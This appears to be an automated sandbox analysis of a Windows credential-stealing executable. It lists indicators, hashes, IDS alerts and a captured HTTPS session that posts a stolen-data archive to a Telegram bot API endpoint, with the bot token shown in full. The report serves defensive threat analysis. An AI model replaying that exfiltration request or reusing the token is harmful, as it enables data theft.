	rukT6hBo6P.exe	Get hash	malicious	Phemedrone Stealer	Browse	172.67.70.233
	gCK3ozTL7Q.ps1	Get hash	malicious	Phemedrone Stealer	Browse	172.67.70.233
	Activation.exe	Get hash	malicious	Phemedrone Stealer	Browse	104.26.1.100
	ZOL2mIYAUH.exe	Get hash	malicious	Phemedrone Stealer, PureLog Stealer, XWorm, zgRAT	Browse	104.26.0.100
api.telegram.org	Inquiry.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	149.154.167.220
	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	149.154.167.220
	Company introduction.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rDEKONT-1_15_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://savory-sweet-felidae-psrnd.glitch.me/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	QUOTATION REQUIRED_Enatel s.r.l..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Confirm Bank Statement.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	q9JZUaS1Gy.doc	Get hash	malicious	Unknown	Browse	149.154.167.220
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	12.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	DESCRIPTION.exe	Get hash	malicious	DarkCloud	Browse	149.154.167.220
	Inquiry.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	149.154.167.220
	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	149.154.167.220
	Company introduction.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rDEKONT-1_15_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://telenerh-ogjf.icu/	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
	http://telegroom-nzj.icu/	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
	https://ofmfy.icu/	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://teiegtrm.cc/EN/	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
	https://teiegtrm.cc/apps.html	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
CLOUDFLARENETUS	http://petruccilaw.com/	Get hash	malicious	Unknown	Browse	104.17.196.192
	PDF6UU0CVUO2W-YGVUIO.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.96.1
	https://eventor.orienteering.asn.au/Home/RedirectToLivelox?redirectUrl=https%3A%2F%2Farchive1.diqx8fescpsb0.amplifyapp.com%2Fm1%2Fenvelope%2Fdocument%2Fcontent%2F4086	Get hash	malicious	Unknown	Browse	104.17.25.14
	PO#_1100015533.scr	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	Davx2k2025.doc	Get hash	malicious	Unknown	Browse	104.18.95.41
	Setup_BrightSlide_1.0.9.exe	Get hash	malicious	Unknown	Browse	1.1.1.1
	9179390927_20250115_155451.html	Get hash	malicious	HTMLPhisher	Browse	104.18.187.31
	Davx2k2025.doc	Get hash	malicious	Unknown	Browse	104.18.95.41
	https://www.pdfforge.org/pdfcreator?srsltid=AfmBOoq1lpA5qNxfcLUyxjmEXAioeKYtqPTpBsIbZ5VOdq3uhOg1WclG	Get hash	malicious	Unknown	Browse	104.21.80.92

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	RFQ_43200046412000086500125.vbs	Get hash	malicious	Discord Token Stealer	Browse	149.154.167.220 172.67.70.233
	0969686.vbe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 172.67.70.233
	Inquiry.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	149.154.167.220 172.67.70.233
	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	149.154.167.220 172.67.70.233
	NEW SHIPPING DOCUMENTS.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 172.67.70.233
	Company introduction.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220 172.67.70.233
	new order.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 172.67.70.233
	rDEKONT-1_15_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220 172.67.70.233
	NLWfV87ouS.dll	Get hash	malicious	Wannacry	Browse	149.154.167.220 172.67.70.233

Process:	C:\Users\user\Desktop\qqnal04.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1498
Entropy (8bit):	5.364175471524945
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhBsXE4Np51qE4GIsCKIE4TKBGKoZAE4KKUN8E4KD:MxHKQwYHKGSI6okHNp51qHGIsCtHTHhX
MD5:	5E8D4A41CB533283B16ADD9EA9F71776
SHA1:	94024969FC44AFC689F4FA71FFB5FC138653936C
SHA-256:	CB35783AEFE84715040AD54206C5D5037FFD1C2CA8061D760D32AFB54B3FC30A
SHA-512:	C95DA8F274972DF0BC4C9AA594CA871CE88583FB420B316EC9BBC300FD1FEF4BA7849458001BCCCDE055898B64F75240C38CC6D1B4E54136CEABF9D089380DA5
Malicious:	true
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Con

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.964935332107461
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	qqnal04.exe
File size:	125'920 bytes
MD5:	b63e93f067d727c983c46012f35647d4
SHA1:	07591cf86732d0e0b1f822eef2147c24bda77df3
SHA256:	eebb47c48137f331e9e7e203763300c343a3643f88c60318667b5d525c40a058
SHA512:	1d21215f2576df3197ba26a4e139e89b9fc72a2337ac641495d946aedb0bb416da9513d9feafbd4201e3b6dc89165623016d9e992032cfdbd417c37363f4a9d5
SSDEEP:	1536:gE6Md2HIvcb2jJFEhFyYwDXEqECixQ7+5M9eNSarewEKweuH4Xjt/0g:gEhzcajJJYwrhTw5weYaKwEKtu8jN0g
TLSH:	37C34B6833FD0A46E6BF8BBEBCB111444FB5F89A6921E74E5D8071D91EA17800D01BB7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........."...0.............&.... ........@.. .......................@............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x41e626
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6787A7A6 [Wed Jan 15 12:18:46 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=GlobalSign Extended Validation CodeSigning CA - SHA256 - G3, O=GlobalSign nv-sa, C=BE
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	27/02/2020 11:39:39 27/02/2021 11:39:39
Subject Chain	E=pkhach@gmail.com, CN=Promresurs LLC, O=Promresurs LLC, STREET="Yunosheskaya St., 50A, lit. A1 room 4", L=Lipetsk, S=Lipetsk Oblast, C=RU, OID.1.3.6.1.4.1.311.60.2.1.2=Lipetsk Oblast, OID.1.3.6.1.4.1.311.60.2.1.3=RU, SERIALNUMBER=1154827021909, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	6672C5047AE0188B87289E9C4ECEF74D
Thumbprint SHA-1:	E78037283B7DD7FD04FAEE34417980EAB583F3EA
Thumbprint SHA-256:	D9F8910AA4885F96AD66AAF0975B85368A2FDAA855C8962FC4EB212418CB59B1
Serial:	479498519E060AE3F8BA1A40

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
push eax
dec ebx
add dword ptr [edx], eax
pop ss
or edx, dword ptr [eax+eax]
add byte ptr [ecx], al
add al, byte ptr [ebx]
add al, 06h
or byte ptr [eax], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1e5d4	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x20000	0x5cc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x1d200	0x19e0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x22000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1e49c	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1c678	0x1c800	35b8b9efcddab3cb4b64e11e09a199c6	False	0.4443959018640351	data	5.873973613241176	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x20000	0x5cc	0x600	7744646dd126a9b008cf0c0cf3b6d202	False	0.423828125	data	4.119288294573772	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x22000	0xc	0x200	2e9661d94e28b9504501886e67235e99	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x20090	0x33c	data			0.4251207729468599
RT_MANIFEST	0x203dc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-15T13:34:03.066622+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49708	149.154.167.220	443	TCP
2025-01-15T13:34:03.068552+0100	2843856	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2	1	192.168.2.5	49708	149.154.167.220	443	TCP
2025-01-15T13:34:04.024220+0100	2039009	ET MALWARE Win32/SaintStealer CnC Response	1	149.154.167.220	443	192.168.2.5	49708	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 13:33:56.453614950 CET	49707	443	192.168.2.5	172.67.70.233
Jan 15, 2025 13:33:56.453664064 CET	443	49707	172.67.70.233	192.168.2.5
Jan 15, 2025 13:33:56.453749895 CET	49707	443	192.168.2.5	172.67.70.233
Jan 15, 2025 13:33:56.480073929 CET	49707	443	192.168.2.5	172.67.70.233
Jan 15, 2025 13:33:56.480093956 CET	443	49707	172.67.70.233	192.168.2.5
Jan 15, 2025 13:33:56.977885962 CET	443	49707	172.67.70.233	192.168.2.5
Jan 15, 2025 13:33:56.978014946 CET	49707	443	192.168.2.5	172.67.70.233
Jan 15, 2025 13:33:56.982695103 CET	49707	443	192.168.2.5	172.67.70.233
Jan 15, 2025 13:33:56.982722044 CET	443	49707	172.67.70.233	192.168.2.5
Jan 15, 2025 13:33:56.983130932 CET	443	49707	172.67.70.233	192.168.2.5
Jan 15, 2025 13:33:57.037342072 CET	49707	443	192.168.2.5	172.67.70.233
Jan 15, 2025 13:33:57.374805927 CET	49707	443	192.168.2.5	172.67.70.233
Jan 15, 2025 13:33:57.415394068 CET	443	49707	172.67.70.233	192.168.2.5
Jan 15, 2025 13:33:57.510818958 CET	443	49707	172.67.70.233	192.168.2.5
Jan 15, 2025 13:33:57.511091948 CET	443	49707	172.67.70.233	192.168.2.5
Jan 15, 2025 13:33:57.511156082 CET	49707	443	192.168.2.5	172.67.70.233
Jan 15, 2025 13:33:57.853277922 CET	49707	443	192.168.2.5	172.67.70.233
Jan 15, 2025 13:34:02.112787008 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:02.112850904 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:02.113120079 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:02.113435030 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:02.113470078 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:02.766007900 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:02.766127110 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:02.770912886 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:02.770941019 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:02.771722078 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:02.773053885 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:02.815366030 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.066570997 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.067783117 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.067848921 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.067989111 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.068025112 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.068217993 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.068420887 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.068569899 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.068595886 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.068624020 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.068639040 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.068746090 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.068763018 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.068798065 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.068814993 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.068870068 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.068881989 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.068953037 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.068985939 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.069025993 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.069039106 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.069061995 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.069078922 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.069135904 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.069165945 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.069195032 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.069210052 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.069227934 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.069344044 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.069377899 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.069427013 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.069458961 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.069525003 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.069655895 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.069690943 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.069777012 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.069843054 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.069876909 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.069941044 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.078861952 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.079013109 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.079256058 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.079273939 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.079298973 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.079341888 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.079369068 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.079468966 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.079484940 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.079509020 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.079539061 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.079570055 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.079591036 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.079629898 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.079644918 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.079674959 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.079690933 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.079709053 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.079710007 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.079740047 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.079744101 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.079765081 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.079765081 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.079792023 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.079828024 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.079832077 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.079849005 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.079863071 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.079876900 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.079878092 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.079914093 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.079914093 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.079946041 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.079973936 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.080022097 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.080051899 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.080051899 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:03.084574938 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:03.091011047 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:04.023652077 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:04.023863077 CET	443	49708	149.154.167.220	192.168.2.5
Jan 15, 2025 13:34:04.024070978 CET	49708	443	192.168.2.5	149.154.167.220
Jan 15, 2025 13:34:04.102833986 CET	49708	443	192.168.2.5	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 13:33:56.441471100 CET	62718	53	192.168.2.5	1.1.1.1
Jan 15, 2025 13:33:56.448812962 CET	53	62718	1.1.1.1	192.168.2.5
Jan 15, 2025 13:34:02.104887962 CET	59046	53	192.168.2.5	1.1.1.1
Jan 15, 2025 13:34:02.111984968 CET	53	59046	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 15, 2025 13:33:56.441471100 CET	192.168.2.5	1.1.1.1	0xb18f	Standard query (0)	get.geojs.io	A (IP address)	IN (0x0001)	false
Jan 15, 2025 13:34:02.104887962 CET	192.168.2.5	1.1.1.1	0x43c0	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 15, 2025 13:33:56.448812962 CET	1.1.1.1	192.168.2.5	0xb18f	No error (0)	get.geojs.io	172.67.70.233	A (IP address)	IN (0x0001)	false
Jan 15, 2025 13:33:56.448812962 CET	1.1.1.1	192.168.2.5	0xb18f	No error (0)	get.geojs.io	104.26.1.100	A (IP address)	IN (0x0001)	false
Jan 15, 2025 13:33:56.448812962 CET	1.1.1.1	192.168.2.5	0xb18f	No error (0)	get.geojs.io	104.26.0.100	A (IP address)	IN (0x0001)	false
Jan 15, 2025 13:34:02.111984968 CET	1.1.1.1	192.168.2.5	0x43c0	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

get.geojs.io

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	172.67.70.233	443	3008	C:\Users\user\Desktop\qqnal04.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 12:33:57 UTC	76	OUT	GET /v1/ip/geo.json HTTP/1.1 Host: get.geojs.io Connection: Keep-Alive
2025-01-15 12:33:57 UTC	1125	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 12:33:57 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-request-id: 17e9708ec4ac987c574aceb6565396b5-ASH strict-transport-security: max-age=15552000; includeSubDomains; preload access-control-allow-origin: * access-control-allow-methods: GET pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 geojs-backend: ash-01 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QeiQtNJuPE368Y%2Ffyf6znsVemwzZJZW243JXihAh9HpjMQcjZSXAR4lOqLUKHvJNoqR%2BX7MbvS8788f9A%2BPxxiqGyG8LgPLzOAX2wnq3kvW3ldS74u63cgIj5i%2BLVA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 9025e5adfbc039f4-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14205&min_rtt=14186&rtt_var=5333&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=690&delivery_rate=205836&cwnd=32&unsent_bytes=0&cid=5085992141465ee2&ts=555&x=0"
2025-01-15 12:33:57 UTC	244	IN	Data Raw: 31 34 36 0d 0a 7b 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 37 34 2e 30 30 36 36 22 2c 22 61 63 63 75 72 61 63 79 22 3a 32 30 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 6e 61 6d 65 22 3a 22 4c 45 56 45 4c 33 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 33 33 35 36 20 4c 45 56 45 4c 33 22 2c 22 61 73 6e 22 3a 33 33 35 36 2c 22 6c 61 74 69 74 75 64 65 22 3a 22 34 30 2e 37 31 32 36 22 2c 22 61 72 65 61 5f 63 6f 64 65 22 3a 22 30 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 Data Ascii: 146{"region":"New York","ip":"8.46.123.189","longitude":"-74.0066","accuracy":20,"timezone":"America\/New_York","organization_name":"LEVEL3","organization":"AS3356 LEVEL3","asn":3356,"latitude":"40.7126","area_code":"0","country":"United Stat
2025-01-15 12:33:57 UTC	89	IN	Data Raw: 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 33 22 3a 22 55 53 41 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 7d 0a 0d 0a Data Ascii: es","country_code":"US","country_code3":"USA","city":"New York","continent_code":"NA"}
2025-01-15 12:33:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49708	149.154.167.220	443	3008	C:\Users\user\Desktop\qqnal04.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 12:34:02 UTC	384	OUT	POST /bot7105371916:AAHmKYUFBY4gzPciIZ6nC4H-7mczREtwqxk/sendDocument HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600 Content-Type: multipart/form-data; boundary=----------------------------8dd3536fad403f1 Host: api.telegram.org Content-Length: 734520 Expect: 100-continue Connection: Keep-Alive
2025-01-15 12:34:03 UTC	25	IN	HTTP/1.1 100 Continue
